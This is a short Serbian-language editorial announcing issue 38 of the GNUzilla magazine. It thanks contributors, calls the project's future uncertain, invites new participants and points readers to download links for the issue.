Избор за најбољи и најгори догађај / пројекат / дистрибуцију / програм / шта год овог пута изостаје, чини ми се пре свега зато што смо овога пута ми ти који смо најгори, те не би било примерно да било коме лепимо било какву етикету. Наравно, година никако није била лоша глобално, локално ту и тамо.

Занимљив садржај и овог пута не изостаје, па ваља пренети неизмерну захвалност свима који су учествовали у раду на овом броју. Када је сам пројекат, односно часопис у питању, ствари су, као што поменух на почетку, прилично неизвесне па дефинитивно „видимо се“ или „до виђења“ остављамо за другу прилику. Позив новим и старим учесницима на пројекту је још увек на снази, па уколико овај број и порука да је ђаво однео шалу допринесу да се следећи појави релативно скоро, „до виђења“ можда остане нешто што се умало десило.

У сваком случају, уживајте у ГНУзили 38, све најбоље у 2009.

Свој примерак можете преузети са званичне странице за преузимање или одавде (RapidShare.com).